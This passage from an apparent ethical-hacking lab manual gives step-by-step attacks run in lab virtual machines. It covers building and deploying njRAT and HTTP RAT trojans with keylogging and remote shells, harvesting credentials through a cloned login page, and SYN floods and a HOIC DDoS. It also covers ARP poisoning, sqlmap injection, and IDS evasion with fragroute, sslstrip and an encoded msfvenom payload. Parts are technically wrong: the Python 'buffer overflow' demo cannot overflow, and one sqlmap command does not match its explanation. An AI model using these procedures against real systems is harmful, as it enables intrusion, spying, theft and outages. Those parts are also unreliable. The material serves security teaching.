○ On the Builder dialog-box, enter the IP address of the Attacker machine -

Windows 10, check the option Copy to StartUp and Registry StarUp, then click
Build as shown below:
○ Save the file on the Desktop and name it [Link].
○ Now, we need to use any technique to send this server to the intended target
through mail or any other way.
○ To make this easier in this lab, I copied the [Link] file in the shared
network location.
○ Execute the Server on the Target Machine
○ In this Lab I'm using a Windows 7 SP1 virtual machine.
○ Drag the [Link] file to your Desktop and double-click it.

○ As you can see below, the connection was successfully established.

○ Switch back to Windows 10 (Attacker). When the target double-clicks the

server, the executable starts running and the njRAT GUI running on the
Windows 10 establishes a persistent connection with the Target machine as
 show below:

○ The GUI displays the machine's basic details such as the IP address, OS,
username and so on.
● Manipulate Files on Target machine
○ Right-click on the detected Target machine and click Manager.
 ○ Double-click on any directory in the left pane. You can right-click any selected
directory and manipulate it using the contextual options:

● Manage the Processes

○ Click on Process Manager on the top menu. You will be redirected to the
Process Manager, where you can right-click any process and perform actions
such as Kill, Delete, and Restart.
○ Manage the Connections
○ Click on Connections on the top menu and select a specific connection,
right-click on it, and click Kill Connection. This action kills the connection
between two machines communicating through a particular port.

○ Manage the Registries

○ Click on Registry on the top menu and choose a registry from the left pane,
right-click on its associated registry files, and a few options appear to
manipulate them.

○ Launch a Remote Shell

○ Click on Remote Shell on the top menu. This action launches a remote
command prompt of the target machine.
 ○ Similarly, you can issue all the other commands that can be executed in the
command prompt of the target.
● Run File
○ On the main window of njRAT, right-click on the Target machine and select
Run File. An attacker makes use of these options to execute scripts or files
remotely from his/her machine.

● Launch a Remote Desktop Connection

○ Right-click on the Target machine and select Remote Desktop Connection

○ This launches a remote desktop connection without the target's consent. You
will be able to remotely interact with the victim machine using the mouse or
keyboard.
 ○ In the same way, you can select the Remote Cam and Microphone to spy on
the target and track voice conversations.
● Perform Key Logging
○ Switch to the Windows 7 (Target machine). Let's assume that you are a
legitimate user and perform a few activities such as logging into any websites
or typing text in some documents.
○ Now, switch back to Windows 10 machine / njRAT GUI and right-click on the
target machine, select the Keylogger option.
● The keylogger window appears, displaying all the keystrokes performed by the target.
 Part (b): HTTP RAT Trojan
THEORY REFRESHER:
HTTP/HTTPS Trojans can bypass any firewall, and work as kind of a straight HTTP
tunnel, but one that works in reverse. They use web-based interfaces and port 80 to gain
access. The execution of these trojans takes place on the internal host and spawns a "child"
at a predetermined time. The child program appears to be a user to the firewall so it allows
the program access to the internet. However, this child executes a local shell, connects to
the web server that the attacker owns on the internet through a legitimate-looking HTTP
request, and sends it a ready signal. The legitimate-looking answer from the attacker's web
server is in reality a series of commands that the child can execute on the machine's local
shell.

Objectives:

● Create a server and Run HTTP Trojan on Windows Server 2012.

● Execute the Server from Windows 10 virtual machine.
● Control Windows 10 machine remotely from Windows Server 2012.

Requisites:

● Windows Server 2012 virtual machine (Attacker).

● Windows 10 virtual machine (Target).

Procedure:

● Create a Trojan on Windows Server

○ Log on to Windows Server 2012 and install the HTTP RAT TROJAN tool:
[Link]
○ Double-click [Link], the HTTP RAT main window appears as shown
below:
○ Uncheck send notification with IP address to mail option, enter the server port
to 84 and click Create.
○ Once the [Link] file is created, a pop-up will be displayed, click OK
and share the file with Windows 10 virtual machine.

○ The file will be saved into HTTP RAT TROJAN folder as show below:

○ Execute the Trojan on Windows 10

○ Now log into Windows 10 and navigate to the place where you saved the
[Link] file. Double click to run the Trojan.
 ○ You will be able to see the Http Server process in the task manager:

● Analyze the Target Machine

○ Switch back to Windows Server 2012 and launch the web browser.
○ Enter the IP address of Windows 10 in the address bar to access the machine.
○ If everything works, you should get this window:

○ Click on the Running processes link to list down processes running on

Windows 10. It is possible to kill any process from here.
○ Click browse and then click Drive C to explore the contents in this drive.

○ Click computer info to view information of the computer, users and hardware.

○ After you are done, end the [Link] process in Windows 10.
 EXPERIMENT 6
Password Cracking and Hash Analysis

Part (a): Hash Identification

COMPONENTS/Tools:
● Kali Linux virtual machine.

PROCEDURE:
● In order to identify the hash algorithm used on each of the given hases, we used hashid
which is a tool used for this exact job.
● We used the option -j that shows the format code that JTR needs in order to run on these
hashes for the next question.
● This tool cannot pinpoint the exact algorithm used for the hash, but on the contrary it
suggests a list of algorithms that could produce a hash like the given.
● For the first hash the most possible is some version of the Message Digest (MD) algorithm

● Similar to the first one, the second hash seems to be an MD hash as well
 ● Judging by the different size of the hash it is clear that a different algorithm than the first two
is used, hashid suggests SHA-1 among other hash types

Part (b): Hash Cracking

COMPONENTS/Tools:
● Kali Linux virtual machine.

PROCEDURE:
● For cracking the above hashes I will use the software called John The Ripper (john aka JTR).
JTR will do a dictionary attack for each hash which will only work if the given format is indeed
the hash algorithm used to create these hashes
● We decided not to provide JTR with a wordlist (dictionary) like [Link] as it can use its
default one (which seems to get the job done).
● First up, trying to crack the first password the MD5 format didn’t return any results. That
either means that the password is not in the dictionary that JTR used to attack, or that the
given format does not match the actual algorithm used.
● Here we can observe that when we run JTR again with MD4 as format, we get a result. With
this we conclude that the first password is “awesome”
● For the last two hashes the process was pretty much the same as I got a hit with the first try.
As it turns out, the password for the second hash is “Princess” and for the third hash it was
“confused”.

● We can verify our findings by running a tool like [Link] which has a pre-computed
hash lookup table for commonly used passwords
 EXPERIMENT 7
Social Engineering Attacks
Objectives:

● Clone a website
● Obtain username and password
● Generate reports for conducted pentesting

Requisites:

● Kali Linux virtual machine

● Any Windows virtual machine

Procedure:

Launch SET

Login to Kali Linux; Remember every Kali version comes with a pre-installed SET,
to launch (on Kali 2019.4) go to Kali Menu > 13 - Social Engineering Tools > SET
(Social Engineering Toolkit).

Accept the Terms of Services by typing y.

Clone a Website
On the SET Main menu, select the first option 1) Social-Engineering Attacks by typing
the number:

Select from the menu:

Next, choose 2) Website Attack Vectors:

Select from the menu:

The Web Attack Vector is a unique way of utilizing multiple web-based attacks in order
to compromise the intended target.

In the next menu, select 3) Credential Harvester Attack Method.

The Credential Harvester Method will utilize web cloning of a website that has a login
input(username and password field) and harvest all the information posted to the website.

Next, select the 2) Site Cloner:

The site cloner is used to clone a website of your choice.

Next, type the IP address of Kali Linux and the URL to be cloned, on this example we will
use [Link] as shown below:

After that, leave this terminal tab running.

Send a Crafted Email

Now you must send the IP address of your Kali machine to a target, and trick him to
click.

For this demo, we will use Gmail; Launch the web browser on your Kali and login
to a Gmail account to compose an email.

This example will demonstrate just the technical aspect of this technique.
To create a proper link, click edit link and first type the actual address under Link
to, and then type the fake URL in the Text to display field.

You can verify the fake URL by clicking one time, it will display the actual URL.
 Log in to the Cloned Website

Log in to Windows as a victim, launch the web browser and sign in to your email
(the account that you sent the phishing email).

When the victim clicks the URL, they will be presented with a replica of
[Link]. The victim will be prompted to enter his/her username and password into
the form fields. After the victim enters the Username and Passwords and clicks log in, it
does not allow logging in; instead, it redirects to the legitimate Facebook login page,
observing the URL.

Obtain the Credentials

The SET on Kali Linux fetches the typed username and password, which
can be used by the attacker to gain unauthorized access to the victim's account.
 EXPERIMENT 8
Denial of Service (DoS) Attack Simulation
(a) SYN Flooding

Requisites

● Kali Linux virtual machine

● Windows 10 virtual machine (w/ Firewall off)
● Windows Server 2012 or 2016 virtual machine

Procedure:

Test for Open Port

Log into the Kali Linux and open a new terminal window.

We are going to perform SYN flooding on Windows 10 through some open port. To
check what port is open or not, we will use Nmap to scan all open ports.
nmap -p- <Windows 10 IP address>

In this lab, we will use an auxiliary module from Metasploit named synflood to
 perform DoS attack on the target using port 445.

(b) Perform DoS attack

● Type msfconsole to launch Metasploit Framework.

msfconsole

● Type the command to load the module:

● To display all the options of the module, type:

msfconsole
use auxiliary/dos/tcp/synflood
options
● We will change the RHOST, RPORT and SHOST parameters:

set RHOST [IP address of Windows 10]

set RPORT 445
set SHOST [IP address of Windows
Server]

● By setting the SHOST option to the IP address of Windows Server, you are
spoofing the IP address of Kali Linux machine.
● Once the auxiliary module is configured, start the DoS attack on Windows
10 by typing:

run

● This begins the SYN flooding on Windows 10.

Examine the DoS Attack

● Switch to the Windows 10 machine and launch the Wireshark, select the correct
interface and click start.
● Wireshark displays the traffic coming from the machine as shown below:

● Here, you can observe that the source IP address is from Windows Server. This
implies that the IP Address of Kali Linux has been spoofed.
● Next, open the Task Manager on Windows 10 and click the performance tab.
● You will observe that the CPU and Ethernet usage has increased drastically after the
attack, which implies that the DoS attack is in progress. If the attack is continued
for some time, the machine's resources would be completely exhausted, and it will
stop responding.

Perform SYN flooding using hping3

hping3 -S [Windows 10 IP address] -a [Kali IP address]

-p 22 --flood
 ● This initiates the SYN flooding on Windows 10.
● Hping3 floods the victim machine by sending bulk SYN bulks and overloading
victim resources.
● Switch to the Windows 10 and launch the Wireshark, select the correct
interface and start capturing.
● Analyze the traffic captured, you will notice the huge number of SYN packets,
which can cause the target machine to crash.

DDoS attack using HOIC

Requisites

● Kali Linux virtual machine (Target)

● Windows Server, Windows 10 and Windows 7 virtual machine (Attackers)

Overview of HOIC
High Orbit Ion Cannon (HOIC) is a free, open-source network stress application
developed by Anonymous, a hacktivist collective, to replace the Low Orbit Ion Cannon
(LOIC). Used for denial of service (DoS) and distributed denial of service (DDoS) attacks, it
functions by flooding target systems with junk HTTP GET and POST requests.
Log in to Virtual Machines
● Before beginning this lab, turn on and log in to all virtual machines on this lab
(Windows 7, 10, Server and Kali Linux).
● Copy the High Orbit Ion Cannon (HOIC) folder onto all the Windows virtual
machines(3).

Configure HOIC
● Switch to the Windows 10 and open the HOIC ([Link])
● On the HOIC GUI, click '+' to add the target.

● On the HOIC - [Target] pop-up:

● Type the target URL (IP address of your Kali)
● Slide the power bar to High
● Select [Link] booster from the drop-down list
 ● Click add

● Set the THREADS value to 20 as shown below:

Now repeat this process on every Windows virtual machine in your lab.

Perform DDoS Attack

● Once HOIC is configured on all machines, switch to each machine and click
FIRE TEH LAZER!.

● This initiates the DDoS attack on the target (Kali Linux).

 ● Switch to the Kali Linux and launch the Wireshark.
● Observe that Wireshark starts capturing a very large volume of packets, which
means the machine is experiencing a huge number of incoming packets.
These packets are coming from the Windows 7, Windows Server and
Windows 10 virtual machines.

Detecting DoS Attack traffic

KFSensor is a Windows-based honeypot IDS. It acts as a honeypot to attract and
detect hackers and worms by simulating vulnerable system services and Trojans. By acting
as a decoy server, it can divert attacks from critical systems and provides a higher level of
information than firewalls and NIDS alone.
KFSensor Free Trial: [Link]
Requisites
● Windows 10 virtual machine
● Windows Server 2012 or 2016 virtual machine
● Kali Linux virtual machine

Setting up
● Install KFSensor and Wireshark on Windows 10 virtual machine.
● Launch the KFSensor as Administrator.
● Click on Settings on the top menu and Set Up Wizard:
 Leave the options as default until and stop on DoS options.
● Select Cautious from Denial of Service Options drop-down list, and select Enable packet
dump files from the Network Protocol Analyzer drop-down list:

● Click next and Finish the wizard:

● On the left panel you will see the FTP icon is green, and the FTP section is empty, it means
currently there is no traffic through port 21.
● Now, the KFSensor is configured to detect DoS attacks.

● In this lab, only three machines are demonstrated flooding a single machine. If
there are a large number of machines performing flooding, then the target Kali
Linux resources are completely consumed and the machine is overwhelmed.
● In real time, a group of hackers operating hundreds or thousands of machines
configure this tool on their machines, and simulate the DDoS attack by
flooding a target machine/website at the same time. The target is
overwhelmed and stops responding to user requests or starts dropping
packets coming from legitimate users. The larger number of attacker
machines, the higher the impact of the attack on the target machine/website.
● To stop the DDoS, click FIRE THE LAZER! again, and then close the HOIC
window in all the attacker virtual machines.
Detecting DoS Attack
Switch to the Windows 10, you should now be able to access it.
Now the FTP icon in the left pane changes to red, and the FTP section in the right pane is
flooded with events.

Scroll down and try to find an event named DOS Attack

This concludes that KFSensor has detected the DoS attack.

 EXPERIMENT 9

Man-in-the-Middle (MITM) Attack Exploration

COMPONENTS/Tools:
● Attacker Machine (kali)
● Victim Machine (windows/linux)

PROCEDURE

Step 1: Install Ettercap if you don't have it installed. In a Linux distribution, you can
install it by running:
Step 2: Start ettercap in graphical mode using sudo, as root privileges are required to
perform sniffing:

sudo apt-get install ettercap-graphical

sudo ettercap -G
Step 3: In the Ettercap GUI, select "Sniff" from the menu, then "Unified Sniffing...",
and choose your network interface.
Step 4: Next, you need to scan for hosts available on your network. Select "Hosts" >
"Host List" > "Binary" > "Load hosts from file". You might need to scan the hosts
before doing this. The host list should then populate with available targets.
Step 5: Now, choose the victims. An MITM attack requires two victims: source and
target. In the "Host List" window, select two hosts. Use the "Add to Target 1" option to
choose the hosts.
Step 6: Start your attack now by selecting "MITM" from the menu and then choosing
"ARP poisoning". Tick the "Sniff remote connections" box and hit "OK".
Step 7: Now you need to start the actual sniffing process. Go to “Start” > “Start
Sniffing”.
Step 8: This step involves viewing the user activities. Go to the "log" option from the
toolbar, and choose "View user log".
At this point, you will be able to monitor the network traffic between your two selected
targets as they pass through your mach
 EXPERIMENT 10

Practical Buffer Overflow Demonstration using Python

Buffer overflow can be a complex concept at first but by understanding basic facts,
anyone can get a good grip on it. Buffer overflow vulnerabilities occur when more data is put
into a buffer than it can handle, causing data to overflow into adjacent memory spaces.

Objective:
Understand and exploit a simple buffer overflow vulnerability using Python

Requirements:
● Python (Python 3.x is recommended)
● Understanding Buffer Overflow
● Let's create code that is vulnerable to buffer overflow in Python.

# [Link]
import socket

def start_server():
server_socket = [Link](socket.AF_INET,
socket.SOCK_STREAM)
server_socket.bind(('localhost',12345))
server_socket.listen(1)
client_socket, addr = server_socket.accept()
while True:
data = client_socket.recv(1024)
print('Received data:', [Link]())
if not data:
break
client_socket.close()

if __name__=="__main__":
start_server()
 ● In the above Python script, we create a simple TCP server that's going to
receive data of size 1024 bytes.
● Exploiting Buffer Overflow
● A potential attacker can try to send more data than this buffer can contain.
We'll simulate this using a Python client.

# [Link]
import socket

def send_data():
client_socket = [Link](socket.AF_INET,
socket.SOCK_STREAM)
client_socket.connect(('localhost', 12345))
payload = 'A' * 5000
client_socket.send([Link]())
client_socket.close()

if __name__=="__main__":
send_data()
● In the above Python client, we send 5000 bytes of data to the server which is
way beyond expected 1024 bytes. This is where buffer overflow is taking
place.

Mitigating Buffer Overflow

● A simple approach to mitigating Buffer Overflow involves limiting user input size:

# Secure [Link]
import socket

def start_secure_server():
server_socket = [Link](socket.AF_INET,
socket.SOCK_STREAM)
server_socket.bind(('localhost', 12345))
server_socket.listen(1)
client_socket, addr = server_socket.accept()
while True:
data = client_socket.recv(1024)
if len(data) > 1024: # Check if data is more than buffer
size
 print('Received data is too large.')
else:
print('Received data:', [Link]())
if not data:
break
client_socket.close()

if __name__=="__main__":
start_secure_server()
● In the secure version of the server, we check the length of the data before
processing it. Hence, even if the client sends larger data, the server handles it
securely without causing buffer overflow.
● To practice this lab, save both vulnerable and secure server scripts as
[Link] and secure_server.py respectively. Similarly, save the client script as
[Link]. Run them locally to simulate buffer overflow and its mitigation."
 EXPERIMENT 11

Exploiting and Mitigating SQL Injection Vulnerabilities

SQL Injection (SQLi) is a code injection technique where hackers can insert malicious
SQL statements into web application database queries. The process of exploiting an SQL
Injection involves making an application execute your SQL statement in a way it was not
intended to.

Objective
● Understand and exploit a simple SQL Injection vulnerability.

Requirements
● SQLmap tool or a similar tool
● Basic understanding of SQL
● Understanding SQL Injection
Procedure:
● Consider a vulnerable PHP script which interacts with a MySQL database:

$query = 'SELECT username, email FROM Users WHERE id=' .

$_GET['id'];
● In the above script, if an attacker modifies the id parameter in the URL like
[Link]/[Link]?id=1 OR 1=1, it could result in all records
from the Users table being displayed.
● In real-world scenarios, this vulnerability can be exploited to manipulate and
extract sensitive data from a database.

Exploiting SQL Injection Using SQLmap

● SQLmap is an open-source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over of
database servers.
 ● Here's a command to test the website for possible vulnerabilities:

sqlmap -u "[Link]/[Link]?id=1"
--dbs
● In the command above, -u specifies the URL to attack, and --dbs instructs
SQLmap to enumerate database names.
● If the website is vulnerable, SQLmap will return a list of all databases in the
server. To enumerate tables in a specific database:
● plaintext

sqlmap -u "[Link]/[Link]?id=1"
--dbs
● Here, -D specifies the database name, and --tables commands SQLmap to
enumerate tables within that database.

Mitigating SQL Injection

SQL injection vulnerabilities occur when user input isn't properly sanitized and is
directly included in an SQL query. To avoid SQL Injection attacks, always sanitize your inputs
and use parameterized queries. PHP's PDO and MySQLi provide support for prepared
statements to help prevent SQL injections.
Here's an example of a secure PHP script using prepared statements:

$stmt = $pdo->prepare('SELECT username, email FROM Users WHERE

id= :id');
$stmt->execute(['id' => $_GET['id']]);
● In this script, :id is a placeholder that gets replaced by $_GET['id'] in a safe
way that prevents injection.
● By practicing and learning more about SQL injections, you'll be better
equipped to write secure code and test applications for these vulnerabilities.
Make sure whenever you test applications for security vulnerabilities, you have
the necessary permissions to do so."
 EXPERIMENT 12

Wireless Network Packet Sniffing and Analysis

Packet Sniffing is the process of capturing and analyzing packets transmitting over a
network. It serves many purposes, from troubleshooting network issues to analyzing network
performance or security vulnerabilities.

Objective
● Learn to capture and analyze wireless network packets.

Requirements
● Wireshark, Aircrack-ng tools
● Knowledge of command line/interface
● A wireless adapter capable of packet capture (monitor mode)
Procedure:
Please note that the activities discussed should be carried out on your own network or
a network you have express permission to use.

Capturing Wireless Network Packets

Firstly, download and install Aircrack-ng and Wireshark on your system. Then, you need to
put your network adapter into monitor mode. This is necessary as it allows your adapter to
capture all packets, not just those intended for your device. Open up your command line
interface and run the following commands:

# Find your wireless network interface

sudo airmon-ng

# Assuming 'wlan0' is your interface, replace with your own if

different
 # Start monitor mode
sudo airmon-ng start wlan0

After this, you should see a new monitor mode interface listed, typically named 'mon0'
or 'wlan0mon'.

Sniffing Network Packets

Now, we're ready to start capturing packets

# Start capturing packets

sudo airodump-ng mon0

This would show you an overview of the wireless networks around you. Once you see
your target network (router's BSSID), start capturing packets by specifying the
channel (CH), and creating a file (.cap) where the packets will be saved for analyzing:

# Capture packets from specific channel (assume channel 11)

and save to a file
sudo airodump-ng -c 11 -w ~/Desktop/capture_file --essid
ROUTER_NAME mon0

Let this run until you feel you've captured enough packets.

Analyzing Network Packets

Now, we can analyze the packets we've captured using Wireshark. Open Wireshark
and load the .cap file you saved earlier:

# Open the capture file with Wireshark

wireshark ~/Desktop/capture_file.cap

Wireshark presents a comprehensive breakdown of each packet, you can see the
source and destination, protocol being used, packet length, and data. Peruse through the
packets, and try using filters for more specific queries.
 EXPERIMENT 13

Intrusion Detection System (IDS) Evasion Techniques

Objectives
● How to deploy and manipulate IDS evasion techniques.
● Understanding of different strategies to bypass IDS.

Requirements
● Kali Linux (Attacker machine)
● Windows 10 (Target machine)
● IDS (Snort, Suricata, or others)

IDS Evasion using IP Fragmentation:

● IP fragmentation can break up the malicious payload across multiple packets, helping
to bypass IDS. We can use 'fragroute' in kali Linux to accomplish this.
● Launch Terminal on your Kali machine.
● Execute the following command, replacing the <Target IP address> with your actual
target:

sudo fragroute -f /etc/[Link] <Target IP address>

IDS Evasion Using Encryption:

● Encrypting the malicious traffic can prevent IDS from inspecting the payloads.
● In Kali Linux, use sslstrip to strip SSL, thereby forcing the browser to use HTTP
instead of HTTPS:

sslstrip -a -k -f
 ● Note: sslstrip -a -k -f intercepts all connections (-a), kills old sessions (-k), and fakes
SSL certificates (-f).

Using Encoding Techniques to Bypass IDS:

● Certain encoding mechanisms like XOR or BASE64 can help bypass IDS detection.
We will use 'Metasploit' for this.
● Launch Metasploit using the following command:

Msfconsole
● Now, generate a payload, but use the '-x' command to encode your payload with
Shikata Ga Nai.

msfvenom -p (payload) -f exe -e x86/shikata_ga_nai -i 20 -o

(filename).exe